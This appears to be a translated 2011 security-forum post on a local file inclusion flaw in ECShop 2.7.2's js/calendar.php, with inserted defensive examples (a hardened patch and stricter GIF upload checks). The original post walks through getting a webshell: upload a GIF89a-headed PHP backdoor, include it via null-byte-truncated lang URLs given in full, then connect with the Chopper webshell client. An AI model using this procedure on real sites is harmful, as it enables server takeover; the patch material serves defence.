ECShop latest version (v2.7.2): local file inclusion to get a SHELL - vulnerability warning - Black Bar Safety Net

ID MYHACK58:62201130886
Type myhack58
Reporter Anonymous
Modified 2011-06-15T00:00:00


Let's look directly at the code (from js/calendar.php):


$lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : 'EN'; // no filtering at all: this is the inclusion vulnerability

if (!file_exists('../languages/' . $lang . '/calendar.php'))
    $lang = 'EN';

require(dirname(dirname(__FILE__)) . '/data/config.php');

header('Content-type: application/x-javascript; charset=' . EC_CHARSET);

include_once('../languages/' . $lang . '/calendar.php'); // included here; the trailing '/calendar.php' has to be truncated away
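The following is an added example, not ECShop's own code: a hardened replacement for the $lang handling shown above. It assumes the same layout the page describes (js/calendar.php including ../languages/<lang>/calendar.php) and that the default language directory EN exists; the function name resolve_lang and the LANG_DIR constant are mine.

```php
<?php
// Added example, not ECShop's code: a hardened replacement for the $lang
// handling in js/calendar.php shown above.  It assumes the same layout
// (js/calendar.php including ../languages/<lang>/calendar.php) and that the
// default language directory 'EN' exists.

define('LANG_DIR', dirname(dirname(__FILE__)) . '/languages');

// Return the language to include, or $default when the requested value
// is not a plain identifier naming an existing language directory.
function resolve_lang($requested, $default = 'EN')
{
    // 1. Whitelist the shape before any filesystem call.  Letters, digits,
    //    '_' and '-' only: this rejects '/', '.' and NUL bytes (a decoded
    //    %00), so neither directory traversal nor the pre-5.3.4 null-byte
    //    truncation that the exploit relies on ever reaches file_exists().
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return $default;
    }

    // 2. Belt and braces: resolve the candidate and confirm it still lives
    //    directly under the languages directory.  file_exists() on its own
    //    is no guard, because the attacker chooses a path to a file that
    //    does exist (the uploaded "GIF").
    $base = realpath(LANG_DIR);
    $file = realpath(LANG_DIR . '/' . $requested . '/calendar.php');
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return $default;
    }
    return $requested;
}

$lang = !empty($_GET['lang']) ? trim($_GET['lang']) : 'EN';
$lang = resolve_lang($lang);

require(dirname(dirname(__FILE__)) . '/data/config.php');
header('Content-type: application/x-javascript; charset=' . EC_CHARSET);
include_once(LANG_DIR . '/' . $lang . '/calendar.php');
```

The important part is step 1: the request value is reduced to a fixed character class before it touches the filesystem, so the %00 and ../ tricks below never get as far as file_exists() or include_once(). Step 2 only matters if a language directory can somehow be created by an attacker, which is why it is treated as a secondary check.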

Some time ago I spent a while poking around an ECShop site. Later I found that this vulnerability, combined with a side door, can be used to take a shell, and the method is simple.

Forge a GIF backdoor file with a GIF89a header to fool the image check, register a mall account, upload the image as an attachment in the "I want to comment" / leave-a-message section, and then use the inclusion above to load it directly and get a SHELL!

The exploit URL circulating online looks like this: http://www.*.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00

To take the SHELL you just append something after the %00, such as a .php. The suffix is cosmetic: include_once() executes whatever file it loads as PHP code regardless of extension, and on PHP before 5.3.4 everything after the %00 is discarded before the path reaches the filesystem, so both the file_exists() check and the include see the uploaded GIF. Both of the following forms work:

For example: js/calendar.php?lang=../data/feedbackimg/309_20110405qzitof.gif%00./1.php

Or directly: js/calendar.php?lang=../data/feedbackimg/309_20110405qzitof.gif%00.php

After uploading the fake GIF, open the URL constructed as above. If the output shown below appears, the inclusion succeeded; if Chinese text appears instead (the normal language-file output), it failed.
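As an added example (not from the original post or from ECShop), the following shows what the forged "GIF" described in the steps above looks like, why a check that only inspects the first bytes accepts it, and a stricter upload check that rejects it. All data is constructed here and the embedded payload is benign; the function names are mine.

```php
<?php
// Added example, not from the post or ECShop: what the forged "GIF" looks
// like, why a header-only image check accepts it, and a stricter check
// that rejects it.  Everything here is constructed; the payload is benign.

// The polyglot: a genuine GIF89a signature followed directly by PHP.
// When js/calendar.php includes this file, the bytes 'GIF89a' are emitted
// as output and the <?php ... ?> block is executed.
function build_polyglot_gif()
{
    return "GIF89a" . "<?php echo 'polyglot executed'; ?>";
}

// What many upload handlers, and getimagesize(), effectively rely on:
// the first bytes look like a GIF.  This is the check the forged header beats.
function header_says_gif($data)
{
    $sig = substr($data, 0, 6);
    return $sig === "GIF87a" || $sig === "GIF89a";
}

// Stricter: require the minimum real GIF structure (6-byte header plus a
// 7-byte logical screen descriptor, ending in the 0x3B trailer byte) and
// refuse anything carrying a PHP or script open tag anywhere in the body.
function is_clean_gif($data)
{
    if (!header_says_gif($data) || strlen($data) < 14) {
        return false;   // too short for header + descriptor + trailer
    }
    if (substr($data, -1) !== "\x3B") {
        return false;   // no GIF trailer
    }
    if (preg_match('/<\?|<script\b/i', $data)) {
        return false;   // embedded PHP/JS open tag
    }
    return true;
}

$forged = build_polyglot_gif();
printf("header-only check accepts forged file: %s\n", header_says_gif($forged) ? 'yes' : 'no');
printf("strict check accepts forged file:      %s\n", is_clean_gif($forged) ? 'yes' : 'no');
```

The tag scan is a mitigation, not a fix: an attacker can still hide code in pixel data, and a check of this kind only raises the bar. The robust options are to re-encode uploaded images with GD (imagecreatefromstring() followed by imagegif()), which drops everything that is not pixel data, and above all to fix the $lang handling in js/calendar.php so that an uploaded file can never be included in the first place.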

By the way, if you are using the pop-up download, I suggest connecting with Chopper instead; it is more convenient!

(The pop-up download that worked before no longer does. It may have been patched in an upgrade, but that has no effect on this vulnerability.)

If you cannot find the message page, append this to the site root: user.php?act=message_list

If that page does not open, this method cannot be used.